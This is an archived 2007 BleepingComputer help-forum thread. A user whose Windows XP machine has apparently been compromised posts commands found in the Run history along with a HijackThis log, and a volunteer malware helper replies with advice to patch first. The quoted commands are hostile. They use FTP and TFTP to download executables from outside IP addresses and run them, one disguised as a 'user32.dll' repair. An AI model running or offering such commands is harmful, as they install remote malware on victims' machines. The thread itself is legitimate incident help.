Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

My Computer Has Been Hijacked, Attached Is The Info I Have


  • This topic is locked This topic is locked
2 replies to this topic

#1 traviwl

traviwl

  • Members
  • 1 posts
  • OFFLINE
  •  
  • Local time:02:30 PM

Posted 05 June 2007 - 08:52 PM

I found these commands when i clicked run, they where in the drop down menu. and i dint put them in. i whoised the ip address and called them, they shut their modems down, but i have no clue how to delete these files. i'm running 3 virus scans right now. btw i just loaded this box and havent installed sp2 yet. any comments would be greatly appreciated.

Thanks.

cmd.exe /c del i&echo open 75.111.14.210 4552 > i&echo user 1 1 >> i &echo get 234.exe >> i &echo quit >> i &ftp -n -s:i &23%syste4mroot%.\system32\ecxe&del mdi.exe&exit

ms-its:D:\WINDOWS\Help\filefold.chm::/sharing_files_overviewW.htm


regsvr32 /n /i inetcpl.cpl


%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 75.5.227.42 GET uohskapt.exe & start uohskapt&



BELOW IS THE HIJACK THIS PRINTOUT:





Logfile of HijackThis v1.99.1
Scan saved at 9:42:16 PM, on 6/5/2007
Platform: Windows XP (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 (6.00.2600.0000)

Running processes:
D:\WINDOWS\System32\smss.exe
D:\WINDOWS\system32\winlogon.exe
D:\WINDOWS\system32\services.exe
D:\WINDOWS\system32\lsass.exe
D:\WINDOWS\system32\svchost.exe
D:\WINDOWS\System32\svchost.exe
D:\WINDOWS\system32\spoolsv.exe
D:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.exe
D:\Program Files\RealVNC\VNC4\WinVNC4.exe
D:\WINDOWS\Explorer.EXE
D:\Program Files\RhinoSoft.com\Serv-U\ServUTray.exe
D:\WINDOWS\System32\wuauclt.exe
D:\PROGRA~1\MOZILL~1\FIREFOX.EXE
D:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
D:\PROGRA~1\Grisoft\AVG7\avgemc.exe
D:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
D:\Program Files\Grisoft\AVG7\avgcc.exe
D:\PROGRA~1\Grisoft\AVG7\avgw.exe
D:\Program Files\Internet Explorer\iexplore.exe
D:\Documents and Settings\Trav\Desktop\HijackThis.exe

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - D:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - D:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - D:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [AVG7_CC] D:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKCU\..\Run: [ServUTrayIcon] D:\Program Files\RhinoSoft.com\Serv-U\ServUTray.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - D:\Program Files\Java\jre1.5.0_06\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - D:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - D:\WINDOWS\web\related.htm
O16 - DPF: {3AF4DACE-36ED-42EF-9DFC-ADC34DA30CFF} (PatchInstaller.Installer) - file://F:\content\include\XPPatchInstaller.CAB
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/...b?1181005885563
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{048A4B57-E3B0-4653-AC6F-5F886903F951}: NameServer = 24.94.163.100,24.94.163.101
O17 - HKLM\System\CS1\Services\Tcpip\..\{048A4B57-E3B0-4653-AC6F-5F886903F951}: NameServer = 24.94.163.100,24.94.163.101
O17 - HKLM\System\CS2\Services\Tcpip\..\{048A4B57-E3B0-4653-AC6F-5F886903F951}: NameServer = 24.94.163.100,24.94.163.101
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - D:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - D:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - D:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Serv-U FTP Server (Serv-U) - Rhino Software, Inc. +1(262) 560-9627 - D:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - D:\Program Files\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

Edited by traviwl, 05 June 2007 - 09:39 PM.


BC AdBot (Login to Remove)

 


m

#2 SifuMike

SifuMike

    malware expert


  • Staff Emeritus
  • 15,385 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Vancouver (not BC) WA (Not DC) USA
  • Local time:11:30 AM

Posted 08 June 2007 - 09:17 PM

Hello traviwl,

We can definitely help you, but first you need to help us.
The first step in this process is to apply Service Pack 1a for Windows XP.

Without this update, you're wide open to re-infection, and we're both just wasting our time.

Click HERE. Apply the update, reboot, and post a fresh Hijack This log.

Install all critical updates except Service Pack 2.
Some hijacks interfere with the installation of Service Pack 2, so please wait until your computer is clean before installing it.

The Internet Explorer version (6.00.2600.0000) is out of date. Check Windows update to update the Internet Explorer.

Edited by SifuMike, 08 June 2007 - 09:19 PM.

If I've saved you time & money,
please make a donation so I can keep helping people just like you! You can donate using a credit card and PayPal. Thank you!



Posted Image

Asking for help via Private Message or Mail will be ignored - So If you need help, post your problem in the forum.

#3 SifuMike

SifuMike

    malware expert


  • Staff Emeritus
  • 15,385 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Vancouver (not BC) WA (Not DC) USA
  • Local time:11:30 AM

Posted 15 June 2007 - 07:10 PM

Due to inactivity, this thread will now be closed. If you need this topic reopened, please contact me or a member of the HJT Team and we will reopen it for you. Include the address of this thread in your request. If you should have a new issue, please start a new topic. This applies only to the original topic starter. Everyone else please begin a New Topic.
If I've saved you time & money,
please make a donation so I can keep helping people just like you! You can donate using a credit card and PayPal. Thank you!



Posted Image

Asking for help via Private Message or Mail will be ignored - So If you need help, post your problem in the forum.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users